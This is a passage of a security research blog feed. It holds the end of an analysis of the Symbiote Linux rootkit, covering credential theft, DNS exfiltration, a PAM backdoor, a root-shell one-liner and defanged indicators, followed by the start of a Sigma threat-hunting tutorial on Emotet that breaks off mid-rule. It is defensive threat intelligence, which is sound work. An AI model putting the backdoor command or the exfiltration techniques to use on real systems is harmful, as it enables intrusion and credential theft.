credentials. The credentials are first encrypted with RC4 using an embedded
key, and then written to a file. For example, one of the versions of the
malware writes the captured credentials to the file &lt;code&gt;/usr/include/certbot.h&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;In addition to storing the credentials locally, the credentials are
exfiltrated. The data is hex encoded and chunked up to be exfiltrated via DNS
address (A) record requests to a domain name controlled by the threat actor.
The A record request has the following format:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;%PACKET_NUMBER%.%MACHINE_ID%.%HEX_ENC_PAYLOAD%.%DOMAIN_NAME%&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Code Snippet 2: Structure of DNS request used by Symbiote to exfiltrate data.&lt;/p&gt;
&lt;p&gt;The malware checks if the machine has a nameserver configured in
&lt;code&gt;/etc/resolv.conf&lt;/code&gt;. If it doesn&amp;rsquo;t, Google&amp;rsquo;s DNS (8.8.8.8) is used. Along with
sending the request to the domain name, Symbiote also sends it as a UDP
broadcast.&lt;/p&gt;
&lt;p&gt;Remote access to the infected machine is achieved by hooking a few Linux
Pluggable Authentication Module (PAM) functions. When a service tries to use
PAM to authenticate a user, the malware checks the provided password against a
hardcoded password. If the password provided is a match, the hooked function
returns a success response. Since the hooks are in PAM, it allows the threat
actor to authenticate to the machine with any service that uses PAM. This
includes remote services such as
&lt;a href="https://www.openssh.com/"target="_blank" rel="noopener"&gt;Secure Shell (SSH)&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;If the entered password does not match the hardcoded password, the malware
saves and exfiltrates it as part of its keylogging functionality. Additionally,
the malware sends a DNS TXT record request to its command-and-control (C2)
domain. The TXT record has the format of &lt;code&gt;%MACHINEID%.%C2_DOMAIN%&lt;/code&gt;. If it gets
a response, the malware base64 decodes the content, checks if the content has
been signed by a correct ed25519 private key, decrypts the content with RC4,
and executes the shell script in a spawned bash process. This functionality can
operate as a break-glass method for regaining access to the machine in case the
normal process doesn&amp;rsquo;t work.&lt;/p&gt;
&lt;p&gt;Once the threat actor has authenticated to the infected machine, Symbiote
provides functionality to gain root privileges. When the shared object is first
loaded, it checks for the environment variable &lt;code&gt;HTTP_SETTHIS&lt;/code&gt;. If the variable
is set with content, the malware changes the effective user and group ID to the
root user, and then clears the variable before executing the content via the
system command.&lt;/p&gt;
&lt;p&gt;This process requires that the SO has the
&lt;a href="https://linux.die.net/man/1/chmod"target="_blank" rel="noopener"&gt;setuid permission&lt;/a&gt; flag set. Once the
system command has exited, Symbiote also exits the process, to prevent the
original process from executing. Figure 3 below shows the code executed. This
allows for spawning a root shell by running
&lt;code&gt;HTTP_SETTHIS=&amp;quot;/bin/bash -p&amp;quot; /bin/true&lt;/code&gt; as any user in a shell.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/06/new-linux-threat-symbiote/images/fig3.png" title="Figure 3: Logic used to execute a command with root privileges." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 3: Logic used to execute a command with root privileges.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Network Infrastructure&lt;span class="hx:absolute hx:-mt-20" id="network-infrastructure"&gt;&lt;/span&gt;
&lt;a href="#network-infrastructure" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The domain names used by the Symbiote malware are impersonating some major
Brazilian banks. This suggests that these banks or their customers are the
potential targets. Using the domain names utilized by the malware, we managed
to uncover a related sample that was uploaded to VirusTotal with the name
certbotx64. This file name matches one of those listed as a file to hide in one
of the Symbiote samples we originally obtained. The file was identified as an
open-source DNS tunneling tool called
&lt;a href="https://github.com/iagox86/dnscat2"target="_blank" rel="noopener"&gt;dnscat2&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The sample had a configuration in the binary that used the
&lt;code&gt;git[.]bancodobrasil[.]dev&lt;/code&gt; domain as its C2 server. During the months of
February and March, this domain name resolved to an IP address that is linked
to Njalla&amp;rsquo;s Virtual Private Server (VPS) service. Passive DNS records showed
that the same IP address was resolved to &lt;code&gt;ns1[.]cintepol[.]link&lt;/code&gt; and
&lt;code&gt;ns2[.]cintepol[.]link&lt;/code&gt; a few months earlier. Cintepol is an
&lt;a href="http://www.seplag.mt.gov.br/index.php?pg=ver&amp;amp;id=300&amp;amp;c=38"target="_blank" rel="noopener"&gt;intelligence portal&lt;/a&gt;
provided by the Federal Police of Brazil. The portal allows police officers to
access different databases provided by the federal police as part of their
investigations. The nameserver used for this impersonating domain name was
active from the middle of December 2021 to the end of January 2022.&lt;/p&gt;
&lt;p&gt;Also starting in February of 2022, the name servers for the domain &lt;code&gt;caixa[.]wf&lt;/code&gt;
were pointing to another Njalla VPS IP. Figure 4 below shows a timeline of
these events. In addition to the network infrastructure, the timestamps of when
the files were submitted to VirusTotal are included. These three Symbiote
samples were uploaded by the same submitter from Brazil. It appears that the
files were submitted to VirusTotal before the infrastructure went online.&lt;/p&gt;
&lt;p&gt;Given that these files were submitted to VirusTotal prior to the infrastructure
going online, and because some of the samples included rules to hide local IP
addresses, it is possible that the samples were submitted to VirusTotal to test
Antivirus detection before being used. Additionally, a version that appears to
be under development was submitted at the end of November from Brazil, further
suggesting VirusTotal was being used by the threat actor or group behind
Symbiote for detection testing.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/06/new-linux-threat-symbiote/images/fig4.png" title="Figure 4: Timeline showing when files were submitted to VirusTotal and when network infrastructure went active." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 4: Timeline showing when files were submitted to VirusTotal and when network infrastructure went active.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Similarity to Other Malware&lt;span class="hx:absolute hx:-mt-20" id="similarity-to-other-malware"&gt;&lt;/span&gt;
&lt;a href="#similarity-to-other-malware" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Symbiote appears to be designed for both credential stealing and to provide
remote access to infected Linux servers. Symbiote is not the first Linux
malware developed for this goal. In 2014, ESET released an
&lt;a href="https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/"target="_blank" rel="noopener"&gt;in-depth analysis of Ebury&lt;/a&gt;,
an OpenSSH backdoor that also performs credential stealing. There are some
similarities in the techniques used by both malware families. Both use hooked
functions to capture credentials and exfiltrate the captured data as DNS
requests. However, the authentication method to the backdoor used by the two
malware families is different. When we first analyzed the samples with Intezer
Analyze, only unique code was detected (Figure 5). As no code is shared between
Symbiote and Ebury/Windigo or any other known malware, we can confidently
conclude that Symbiote is a new, undiscovered Linux malware.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/06/new-linux-threat-symbiote/images/fig5.png" title="Figure 5: Intezer analysis of a Symbiote sample showing only genes classified as Symbiote." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 5: Intezer analysis of a Symbiote sample showing only genes classified as Symbiote.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;span class="hx:absolute hx:-mt-20" id="conclusion"&gt;&lt;/span&gt;
&lt;a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Symbiote is a malware that is highly evasive. Its main objective is to capture
credentials and to facilitate backdoor access to infected machines. Since the
malware operates as a userland level rootkit, detecting an infection may be
difficult. Network telemetry can be used to detect anomalous DNS requests and
security tools such as antivirus (AVs) and endpoint detection and response
(EDRs) should be statically linked to ensure they are not &amp;ldquo;infected&amp;rdquo; by
userland rootkits.&lt;/p&gt;
&lt;h2&gt;Indicators of Compromise (IoCs)&lt;span class="hx:absolute hx:-mt-20" id="indicators-of-compromise-iocs"&gt;&lt;/span&gt;
&lt;a href="#indicators-of-compromise-iocs" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;Hashes&lt;span class="hx:absolute hx:-mt-20" id="hashes"&gt;&lt;/span&gt;
&lt;a href="#hashes" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;Hash Notes
121157e0fcb728eb8a23b55457e89d45d76aa3b7d01d3d49105890a00662c924 &amp;#34;kerneldev.so.bkp.&amp;#34; Appears to be an early development build.
f55af21f69a183fb8550ac60f392b05df14aa01d7ffe9f28bc48a118dc110b4c &amp;#34;mt64_.so.&amp;#34; Missing credential exfiltration over DNS.
ec67bbdf55d3679fca72d3c814186ff4646dd779a862999c82c6faa8e6615180 &amp;#34;search.so.&amp;#34; First sample with credential exfiltration of DNS.
a0cd554c35dee3fed3d1607dc18debd1296faaee29b5bd77ff83ab6956a6f9d6 &amp;#34;liblinux.so.&amp;#34;
45eacba032367db7f3b031e5d9df10b30d01664f24da6847322f6af1fd8e7f01 &amp;#34;certbotx64.&amp;#34; dnscat2 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;Ports Hidden&lt;span class="hx:absolute hx:-mt-20" id="ports-hidden"&gt;&lt;/span&gt;
&lt;a href="#ports-hidden" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;45345
34535
64543
24645
47623
62537
43253
43753
63424
26424&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;Domains Hidden&lt;span class="hx:absolute hx:-mt-20" id="domains-hidden"&gt;&lt;/span&gt;
&lt;a href="#domains-hidden" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;assets[.]fans
caixa[.]cx
dpf[.]fm
bancodobrasil[.]dev
cctdcapllx0520
cctdcapllx0520[.]df[.]caixa
webfirewall[.]caixa[.]wf
caixa[.]wf&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;Process Names Hidden&lt;span class="hx:absolute hx:-mt-20" id="process-names-hidden"&gt;&lt;/span&gt;
&lt;a href="#process-names-hidden" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;javaserverx64
javaclientex64
javanodex86
apache2start
apache2stop
[watchdog/0]
certbotx64
certbotx86
javautils&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;File Names Hidden&lt;span class="hx:absolute hx:-mt-20" id="file-names-hidden"&gt;&lt;/span&gt;
&lt;a href="#file-names-hidden" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;apache2start
apache2stop
profiles.php
404erro.php
javaserverx64
javaclientex64
javanodex86
liblinux.so
java.h
open.h
mpt86.h
sqlsearch.php
indexq.php
mt64.so
certbot.h
cert.h
certbotx64
certbotx86
javautils
search.so&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;Credential Exfil Domains&lt;span class="hx:absolute hx:-mt-20" id="credential-exfil-domains"&gt;&lt;/span&gt;
&lt;a href="#credential-exfil-domains" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;*.x3206.caixa.cx
*.dev21.bancodobrasil.dev&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;</description></item><item><title>SOC Level Up: Threat Hunting and Detection With Sigma</title><link>https://research.intezer.com/blog/2022/05/threat-hunting-sigma-detection-rules/</link><pubDate>Tue, 17 May 2022 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2022/05/threat-hunting-sigma-detection-rules/</guid><description>
&lt;p&gt;In the last part of the SOC Level Up series, we introduced
&lt;a href="../../../2022/03/intro-to-sigma-rules/"&gt;Sigma&lt;/a&gt; – an open-source framework to
write one rule that can be used in multiple environments. In this blog, we will
show how Sigma rules can be used for threat hunting and detection.&lt;/p&gt;
&lt;p&gt;Security teams and especially SOC analysts are overwhelmed with data while
attack surfaces are growing and cyber attackers find new ways to breach
organizations while staying undetected, making the security team&amp;rsquo;s difficulties
more painful. The solution might sound obvious – have a well-defined security
posture to prevent threats from getting into the system, but with the
constantly evolving threat landscape and existing pain points of security
teams, this is easier said than done. Therefore, it is critical to proactively
hunt and detect threats in the organization, for any incidents in which the
threat bypassed all of the security measures and infiltrated the environment.&lt;/p&gt;
&lt;h2&gt;How Sigma Can Help in Threat Hunting&lt;span class="hx:absolute hx:-mt-20" id="how-sigma-can-help-in-threat-hunting"&gt;&lt;/span&gt;
&lt;a href="#how-sigma-can-help-in-threat-hunting" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;To detect threats you need to know what is happening in the environment, which
can be accomplished using logs and monitoring tools (which are based on logs
too). But these days the issue is that there are too many logs – too much
information – that SOC analysts and security teams are not capable of analyzing
and processing them all. So SIEM platforms came to help, providing the ability
to aggregate, query, and extract important information from the logs.
Essentially making it possible to proactively hunt for threats inside the
organization.&lt;/p&gt;
&lt;p&gt;While security tools are evolving, so do cyber attackers. This progression
makes threat detection even more significant and forces the security community
to further evolve the hunting and detection strategy. The new and more advanced
approach to threat hunting is
&lt;a href="https://intezer.com/blog/threat-hunting/scale-incident-response-detection-engineering/"target="_blank" rel="noopener"&gt;detection engineering&lt;/a&gt;
– a process of constantly evolving and tuning to detect threats before they
cause significant damage. In a way it requires a change in the mindset, you
need to see the traces left by a threat as detection opportunities and use them
to detect the threat in your organization.&lt;/p&gt;
&lt;p&gt;Sigma is a universal markup language for analyzing logs, allowing you to write
rules for detecting a threat based on the threat&amp;rsquo;s detection opportunities. The
flexibility of Sigma rules makes it possible to use detection rules created by
other members of the security community and utilize them in your organization,
since the rule can be compiled for any SIEM and log source.&lt;/p&gt;
&lt;p&gt;Below, we will show how to identify detection opportunities in blogs or
security tools, and how to use this information to create your own detection
rules using Sigma.&lt;/p&gt;
&lt;h2&gt;How to Use Sigma Rules For Threat Hunting&lt;span class="hx:absolute hx:-mt-20" id="how-to-use-sigma-rules-for-threat-hunting"&gt;&lt;/span&gt;
&lt;a href="#how-to-use-sigma-rules-for-threat-hunting" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Creating detection rules is not an easy task, for two main reasons.&lt;/p&gt;
&lt;p&gt;First, you need to find indicators that can be used to detect the threat,
either by performing an analysis of existing samples of the threat or by
locating them in technical reports and threat intelligence feeds. Frequently
the detection information is &amp;ldquo;hidden&amp;rdquo; among the rest of the details. Either
way, it requires time and effort to find useful information that can be used in
detection rules.&lt;/p&gt;
&lt;p&gt;The other difficulty is making an efficient rule, one that will not trigger
false positive alerts and is not too strict to avoid miss detection of threats.
Detection rules are made of different indicators of compromise and behavior
artifacts, all of which can be arranged in what is known as the
&lt;a href="http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html"target="_blank" rel="noopener"&gt;Pyramid of Pain&lt;/a&gt;
(created by David J Bianco). The idea is to organize attack indicators in
ascending order based on the &amp;ldquo;pain&amp;rdquo; it will cause the attackers when these
indicators are detected and denied from them by security tools. But the more
harm it will cause the attacker, the harder it is for security teams to
identify these indicators.&lt;/p&gt;
&lt;p&gt;For example, a file&amp;rsquo;s hash is the easiest indicator to find and to detect but
it is also trivial for threat actors to modify it simply by changing one bit in
a file. On the other hand, detecting a threat based on its behavior (TTPs)
requires more effort from the security team – they need to execute the threat
in a sandbox and understand its execution flow. But for threat actors, it is
also much harder to change the behavior of the threat and stay undetected.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/05/threat-hunting-sigma-detection-rules/images/fig1.png" title="Pyramid of Pain by David J Bianco" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Pyramid of Pain by David J Bianco&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Using Sigma to Write Detection Rules for Emotet&lt;span class="hx:absolute hx:-mt-20" id="using-sigma-to-write-detection-rules-for-emotet"&gt;&lt;/span&gt;
&lt;a href="#using-sigma-to-write-detection-rules-for-emotet" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Let&amp;rsquo;s take a look at
&lt;a href="https://analyze.intezer.com/families/db6abbcc-d292-4991-bc90-207c077f5e53"target="_blank" rel="noopener"&gt;Emotet&lt;/a&gt;
– a dangerous malware that has been operating since 2014. Despite the arrests
and the efforts of law enforcement in
&lt;a href="https://www.europol.europa.eu/media-press/newsroom/news/world%E2%80%99s-most-dangerous-malware-emotet-disrupted-through-global-action"target="_blank" rel="noopener"&gt;January 2021&lt;/a&gt;,
the malware is
&lt;a href="https://www.globenewswire.com/news-release/2022/03/09/2399720/0/en/February-2022-s-Most-Wanted-Malware-Emotet-Remains-Number-One-While-Trickbot-Slips-Even-Further-Down-the-Index.html"target="_blank" rel="noopener"&gt;still operating&lt;/a&gt;.
Emotet started as a banking information stealer, but it kept evolving during
its time of operation and became a full-scale cybercrime organization that is
also able to deploy other threats into compromised systems.&lt;/p&gt;
&lt;p&gt;Usually, the chain of execution that drops Emotet consists of a phishing email
with attached decoy document that tricks the user to click a link or just open
the file allowing the execution of malicious code that leads to Emotet
execution.&lt;/p&gt;
&lt;p&gt;Our goal is to write detection rules for Emotet, so let&amp;rsquo;s take a look at a
recently discovered
&lt;a href="https://analyze.intezer.com/files/6d55f25222831cce73fd9a64a8e5a63b002522dc2637bd2704f77168c7c02d88/behavior"target="_blank" rel="noopener"&gt;sample&lt;/a&gt;
of Emotet. We will use oleid and olevba to discover the macros embedded in the
file (for more information, check out this blog about
&lt;a href="https://intezer.com/blog/malware-analysis/analyze-malicious-microsoft-office-files/"target="_blank" rel="noopener"&gt;analyzing malicious Office files&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/05/threat-hunting-sigma-detection-rules/images/fig2.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;From this short analysis, we know that the malicious document will execute
commands using cmd and it will use a signed binary called MSHTA to download and
execute code from a given URL. Using legitimate and signed binaries is a very
common technique used by threat actors – you can read more about
&lt;a href="../../../2022/03/boost-your-soc-skills-how-to-detect-good-apps-gone-bad"&gt;how to detect MSHTA and related techniques here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;In general, the process tree of the threat execution provides very useful
detection indicators. We can get even more information by executing the sample
in a sandbox environment and inspecting the process tree as shown below.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/05/threat-hunting-sigma-detection-rules/images/fig3.png" title="Process tree of the sample election in Intezer." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Process tree of the sample election in Intezer.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;We will use the following information to make a basic Sigma rule:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The sample connects to the IP address &lt;code&gt;91.240.118[.]16&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;URL: &lt;code&gt;http://91.240.118[.]168/zzx/ccv/fe.html&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;The processes that are executed are excel.exe -&amp;gt; cmd.exe -&amp;gt; mshta.exe&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nt"&gt;title&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;Emotet document execution detection&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;author&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;Intezer&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;logsource&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;category&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;process_creation&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;product&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;windows&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;detection&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
